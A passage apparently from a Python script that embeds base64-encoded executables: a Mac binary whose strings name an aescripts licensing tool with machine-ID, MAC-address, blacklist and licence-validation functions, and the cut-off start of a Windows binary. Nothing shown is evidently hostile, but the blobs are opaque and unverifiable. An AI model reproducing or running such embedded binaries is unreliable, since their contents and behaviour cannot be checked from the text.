AAAQAAAFUSAAAPAYAARFkAAAEAAAC5EgAADwGAAMBZAAABAAAA+hIAAA8BgAA7PwAAAQAAADATAAAPDgAAqHIAAAEAAAA8EwAAAwEQAAAAAAABAAAAUBMAAA8OAACgcgAAAQAAAFkTAAAPAQAAMBIAAAEAAABfEwAAAQAABgAAAAAAAAAAbRMAAAEAAAYAAAAAAAAAAHwTAAABAAAFAAAAAAAAAACMEwAAAQAABAAAAAAAAAAAnxMAAAEAAAQAAAAAAAAAALETAAABAAA
EAAAAAAAAAADnEwAAAQAABAAAAAAAAAAAIBQAAAEAAAQAAAAAAAAAAE4UAAABAAAEAAAAAAAAAAB9FAAAAQAABAAAAAAAAAAAmhQAAAEAAAQAAAAAAAAAAKoUAAABAAAEAAAAAAAAAADJFAAAAQAABAAAAAAAAAAA2BQAAAEAAAQAAAAAAAAAAOUUAAABAAAEAAAAAAAAAAD0FAAAAQAABAAAAAAAAAAABhUAAAEAAAQAAAAAAAAAACAVAAABAAAEAAAAAAAAAAA3FQAAAQAABAAAAAAAAAAAVxUAAAEAAAQAAAAAAAAAAHEVAAABAAAEAAAAAAAAAACUFQAAAQAABAAAAAAAAAAAtBUAAAEAAAQAAAAAAAAAAMQVAAABAAAEAAAAAAAAAADXFQAAAQAABAAAAAAAAAAA6hUAAAEAAAQAAAAAAAAAAP0VAAABAAAEAAAAAAAAAAAQFgAAAQAABAAAAAAAAAAAJRYAAAEAAAQAAAAAAAAAADgWAAABAAAEAAAAAAAAAABMFgAAAQAABAAAAAAAAAAAYRYAAAEAAAQAAAAAAAAAAG8WAAABAAAEAAAAAAAAAAB6FgAAAQAABAAAAAAAAAAArhYAAAEAAAQAAAAAAAAAAPEWAAABAAAEAAAAAAAAAAAhFwAAAQAABAAAAAAAAAAAVRcAAAEAAAQAAAAAAAAAAJgXAAABAAAEAAAAAAAAAADIFwAAAQAABAAAAAAAAAAAERgAAAEAAAQAAAAAAAAAAEoYAAABAAAEAAAAAAAAAABjGAAAAQAABAAAAAAAAAAAfBgAAAEAAAQAAAAAAAAAAMsYAAABAAAEAAAAAAAAAADpGAAAAQAABAAAAAAAAAAA9BgAAAEAAAQAAAAAAAAAAAUZAAABAIAEAAAAAAAAAAANGQAAAQCABAAAAAAAAAAAFBkAAAEAAAUAAAAAAAAAACIZAAABAAAEAAAAAAAAAAA1GQAAAQAABAAAAAAAAAAARhkAAAEAAAQAAAAAAAAAAFwZAAABAAAFAAAAAAAAAABuGQAAAQAABQAAAAAAAAAAgRkAAAEAAAUAAAAAAAAAAIcZAAABAAAFAAAAAAAAAACNGQAAAQAABQAAAAAAAAAAkxkAAAEAAAUAAAAAAAAAAKAZAAABAAAFAAAAAAAAAACsGQAAAQAABQAAAAAAAAAAtBkAAAEAAAUAAAAAAAAAAMYZAAABAAAFAAAAAAAAAADPGQAAAQAABQAAAAAAAAAA1xkAAAEAAAUAAAAAAAAAAN8ZAAABAAAFAAAAAAAAAADnGQAAAQAABQAAAAAAAAAAswAAALAAAACxAAAAuwAAALwAAAC9AAAAvgAAAL8AAADAAAAAwQAAAMIAAADDAAAAxAAAAMUAAADGAAAAxwAAAMgAAADJAAAAygAAAM0AAADOAAAAzwAAANAAAADRAAAA0gAAANMAAADUAAAA1QAAANYAAADXAAAA2AAAANkAAADaAAAA2wAAANwAAADdAAAA3gAAAN8AAADgAAAA4QAAAOMAAADkAAAA5gAAAOcAAADoAAAA6gAAAOsAAAC6AAAA6QAAAO0AAADvAAAA8AAAAPEAAADyAAAA8wAAAPQAAAD1AAAA9gAAAPcAAAD4AAAA+QAAALgAAAC5AAAAywAAAMwAAADiAAAA5QAAAOwAAADuAAAA+gAAAAAAAECzAAAAsAAAALEAAAC7AAAAvAAAAL0AAAC+AAAAvwAAAMAAAADBAAAAwgAAAMMAAADEAAAAxQAAAMYAAADHAAAAyAAAAMkAAADKAAAAzQAAAM4AAADPAAAA0AAAANEAAADSAAAA0wAAANQAAADVAAAA1gAAANcAAADYAAAA2QAAANoAAADbAAAA3AAAAN0AAADeAAAA3wAAAOAAAADhAAAA4wAAAOQAAADmAAAA5wAAAOgAAADqAAAA6wAAALoAAADpAAAA7QAAAO8AAADwAAAA8QAAAPIAAADzAAAA9AAAAPUAAAD2AAA
A9wAAAPgAAAD5AAAAuAAAALkAAAAgAC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy90b29scy9NYWMvAC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy90b29scy9NYWMvLi4vYWVzY3JpcHRzTGljZW5zZXIuY3BwAC9Vc2Vycy9Vc2VyL0xpYnJhcnkvRGV2ZWxvcGVyL1hjb2RlL0Rlcml2ZWREYXRhL2Flc2NyaXB0c0xpY2Vuc2VyLWNnb2tzZ2lxdHNhZ2hyYW1rbml6c2VlZXFzd2cvQnVpbGQvSW50ZXJtZWRpYXRlcy9hZXNjcmlwdHNMaWNlbnNlci5idWlsZC9SZWxlYXNlL2Flc2NyaXB0c0xpY2Vuc2VyLmJ1aWxkL09iamVjdHMtbm9ybWFsL3g4Nl82NC9hZXNjcmlwdHNMaWNlbnNlci5vAF9tYWluAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9vc3RyZWFtAF9fR0xPQkFMX19JX2EAX19aU3RMOF9faW9pbml0AC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy9zcmMvTWFjLwAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvc3JjL01hYy8uLi9MaWNlbnNpbmdfdjJfZm9yX1NES19wbHVnaW5zLmNwcAAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvdG9vbHMvTWFjLy4uLy4uL2xpYi9NYWMvYWVzY3JpcHRzTGljZW5zaW5nX1JlbGVhc2VfNjQuYShMaWNlbnNpbmdfdjJfZm9yX1NES19wbHVnaW5zLm8pAF9fWjE4Y2hlY2tCbGFja0xpc3Rfb2xkaWkAX19aMTRjaGVja0JsYWNrTGlzdGlpaWkAX19aMTNyZXZlcnNlU3RyaW5nU3MAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvYmFzaWNfc3RyaW5nLmgAX19aMTRtYWtlU2VlZHNBcnJheVNzaQAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvZXh0L2F0b21pY2l0eS5oAF9fWjRrZXkxU3NpAF9fWkwxMWdldENoZWNrc3VtU3NTcwBfX1pMMTJCaXRfTWFuZ2xlXzFpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfMmlpaWlpaWkAX19aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzRpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfNWlpaWlpaWkAX19aU3RwbEljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFU2JJVF9UMF9UMV9FUktTNl9TOF8AR0NDX2V4Y2VwdF90YWJsZTIAR0NDX2V4Y2VwdF90YWJsZTMAR0NDX2V4Y2VwdF90YWJsZTQAR0NDX2V4Y2VwdF90YWJsZTUAXy5tZW1zZXRfcGF0dGVybgAvVXN
lcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvc3JjL01hYy8uLi9NQUNBZGRyZXNzVXRpbGl0eS5jcHAAL1VzZXJzL1VzZXIvRG9jdW1lbnRzL1RvYnkvYWVzY3JpcHRzTGljZW5zaW5nL3Rvb2xzL01hYy8uLi8uLi9saWIvTWFjL2Flc2NyaXB0c0xpY2Vuc2luZ19SZWxlYXNlXzY0LmEoTUFDQWRkcmVzc1V0aWxpdHkubykAX19aTjE3TUFDQWRkcmVzc1V0aWxpdHkxOEdldEFsbE1BQ0FkZHJlc3Nlc0VQaABfX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTIxR2V0QWxsTUFDQWRkcmVzc2VzTWFjRVBoAF9fR0xPQkFMX19JX2EAX19aU3RMOF9faW9pbml0AC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy9zcmMvTWFjLy4uL2Flc2NyaXB0c0xpY2Vuc2luZy5jcHAAL1VzZXJzL1VzZXIvRG9jdW1lbnRzL1RvYnkvYWVzY3JpcHRzTGljZW5zaW5nL3Rvb2xzL01hYy8uLi8uLi9saWIvTWFjL2Flc2NyaXB0c0xpY2Vuc2luZ19SZWxlYXNlXzY0LmEoYWVzY3JpcHRzTGljZW5zaW5nLm8pAF9fWk45YWVzY3JpcHRzMTJnZXRNYWNoaW5lSWRFUkExMjhfYwBfX1pOOWFlc2NyaXB0czE5bG9hZExpY2Vuc2VGcm9tRmlsZUVQY1JBMTI4X2MAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2ZzdHJlYW0AL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvcG9zdHlwZXMuaAAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9pb3NfYmFzZS5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL3N0bF9pdGVyYXRvci5oAF9fWk45YWVzY3JpcHRzMTV2YWxpZGF0ZUxpY2Vuc2VFUGNpUk5TXzExTGljZW5zZURhdGFFAF9fWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQY1MwXwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9jaGFyX3RyYWl0cy5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWR
lL2MrKy80LjIuMS9pb21hbmlwAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL2Jhc2ljX2lvcy5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9zc3RyZWFtAF9fWk45YWVzY3JpcHRzN2dldFBhdGhFU3NiUlNzAF9fWk5TczEyX1NfY29uc3RydWN0SU45X19nbnVfY3h4MTdfX25vcm1hbF9pdGVyYXRvcklQY1NzRUVFRVMyX1RfUzRfUktTYUljRVN0MjBmb3J3YXJkX2l0ZXJhdG9yX3RhZwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9iYXNpY19zdHJpbmcudGNjAF9fWk5TczEyX1NfY29uc3RydWN0SVBjRUVTMF9UX1MxX1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvc3RsX2l0ZXJhdG9yX2Jhc2VfZnVuY3MuaABfX0dMT0JBTF9fSV9hAEdDQ19leGNlcHRfdGFibGUxAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGU2AEdDQ19leGNlcHRfdGFibGU4AF9fWlN0TDhfX2lvaW5pdABfbWFpbgBfX0dMT0JBTF9fSV9hAF9fWkwxMWdldENoZWNrc3VtU3NTcwBfX1pMMTJCaXRfTWFuZ2xlXzFpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfMmlpaWlpaWkAX19aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzRpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfNWlpaWlpaWkAX19HTE9CQUxfX0lfYQBfX0dMT0JBTF9fSV9hAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGUzAEdDQ19leGNlcHRfdGFibGU0AEdDQ19leGNlcHRfdGFibGU1AEdDQ19leGNlcHRfdGFibGUxAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGU2AEdDQ19leGNlcHRfdGFibGU4AF8ubWVtc2V0X3BhdHRlcm4AX19aU3RMOF9faW9pbml0AF9fWlN0TDhfX2lvaW5pdABfX1pTdEw4X19pb2luaXQAX05YQXJnYwBfTlhBcmd2AF9fWjEzcmV2ZXJzZVN0cmluZ1NzAF9fWjE0Y2hlY2tCbGFja0xpc3RpaWlpAF9fWjE0bWFrZVNlZWRzQXJyYXlTc2kAX19aMThjaGVja0JsYWNrTGlzdF9vbGRpaQBfX1o0a2V5MVNzaQBfX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0QWxsTUFDQWRkcmVzc2VzRVBoAF9fWk4xN01BQ0FkZHJlc3NVdGlsaXR5MjFHZXRBbGxNQUNBZGRyZXNzZXN
NYWNFUGgAX19aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAF9fWk45YWVzY3JpcHRzMTV2YWxpZGF0ZUxpY2Vuc2VFUGNpUk5TXzExTGljZW5zZURhdGFFAF9fWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQY1MwXwBfX1pOOWFlc2NyaXB0czE5bG9hZExpY2Vuc2VGcm9tRmlsZUVQY1JBMTI4X2MAX19aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX19aTlNzMTJfU19jb25zdHJ1Y3RJTjlfX2dudV9jeHgxN19fbm9ybWFsX2l0ZXJhdG9ySVBjU3NFRUVFUzJfVF9TNF9SS1NhSWNFU3QyMGZvcndhcmRfaXRlcmF0b3JfdGFnAF9fWk5TczEyX1NfY29uc3RydWN0SVBjRUVTMF9UX1MxX1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAX19aU3RwbEljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFU2JJVF9UMF9UMV9FUktTNl9TOF8AX19fcHJvZ25hbWUAX19taF9leGVjdXRlX2hlYWRlcgBfZW52aXJvbgBzdGFydABfRlNGaW5kRm9sZGVyAF9GU1JlZk1ha2VQYXRoAF9fVW53aW5kX1Jlc3VtZQBfX1pOS1NzNGZpbmRFUEtjbW0AX19aTktTczZzdWJzdHJFbW0AX19aTktTdDEzYmFzaWNfZmlsZWJ1ZkljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXYAX19aTktTdDE1YmFzaWNfc3RyaW5nYnVmSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUUzc3RyRXYAX19aTktTdDliYXNpY19pb3NJY1N0MTFjaGFyX3RyYWl0c0ljRUU0ZmlsbEV2AF9fWk5LU3Q5YmFzaWNfaW9zSWNTdDExY2hhcl90cmFpdHNJY0VFNXdpZGVuRWMAX19aTlNpMTBfTV9leHRyYWN0SW1FRVJTaVJUXwBfX1pOU2k0cmVhZEVQY2wAX19aTlNpNXNlZWtnRXhTdDEyX0lvc19TZWVrZGlyAF9fWk5TaTV0ZWxsZ0V2AF9fWk5TbzNwdXRFYwBfX1pOU281Zmx1c2hFdgBfX1pOU281d3JpdGVFUEtjbABfX1pOU285X01faW5zZXJ0SW1FRVJTb1RfAF9fWk5TczEyX01fbGVha19oYXJkRXYAX19aTlNzNF9SZXAxMF9NX2Rlc3Ryb3lFUktTYUljRQBfX1pOU3M0X1JlcDExX1NfdGVybWluYWxFAF9fWk5TczRfUmVwMjBfU19lbXB0eV9yZXBfc3RvcmFnZUUAX19aTlNzNF9SZXA5X1NfY3JlYXRlRW1tUktTYUljRQBfX1pOU3M1ZXJhc2VFbW0AX19aTlNzNmFwcGVuZEVQS2NtAF9fWk5TczZhcHBlbmRFUktTcwBfX1pOU3M2YXNzaWduRVBLY20AX19aTlNzNmFzc2lnbkVSS1NzAF9fWk5TczlfTV9tdXRhdGVFbW1tAF9fWk5TczlwdXNoX2JhY2tFYwBfX1pOU3NDMUVQS2NSS1NhSWNFAF9fWk5Tc0MxRVBLY21SS1NhSWNFAF9fWk5Tc0MxRVJLU3MAX19aTlNzRDJFdgBfX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFNWNsb3NlRXYAX19aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9fWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfX1pOU3Q
xNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGUAX19aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXYAX19aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2AF9fWk5TdDhpb3NfYmFzZTRJbml0QzFFdgBfX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX19aU3QxNl9fb3N0cmVhbV9pbnNlcnRJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfUEtTM19sAF9fWlN0MTlfX3Rocm93X2xvZ2ljX2Vycm9yUEtjAF9fWlN0NGNvdXQAX19aU3Q5dGVybWluYXRldgBfX1pkYVB2AF9fWm5hbQBfX19jeGFfYXRleGl0AF9fX2N4YV9iZWdpbl9jYXRjaABfX19jeGFfZW5kX2NhdGNoAF9fX2d4eF9wZXJzb25hbGl0eV92MABfX19zdGFja19jaGtfZmFpbABfX19zdGFja19jaGtfZ3VhcmQAX2F0b2kAX2F0b2wAX2V4aXQAX2ZyZWVpZmFkZHJzAF9nZXRpZmFkZHJzAF9tZW1jcHkAX21lbXNldF9wYXR0ZXJuMTYAX3NwcmludGYAX3N0cmNtcABfc3RyY3B5AF9zdHJsZW4AZHlsZF9zdHViX2JpbmRlcgA=')
return R
if a.__isWindows():
R = at(
'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
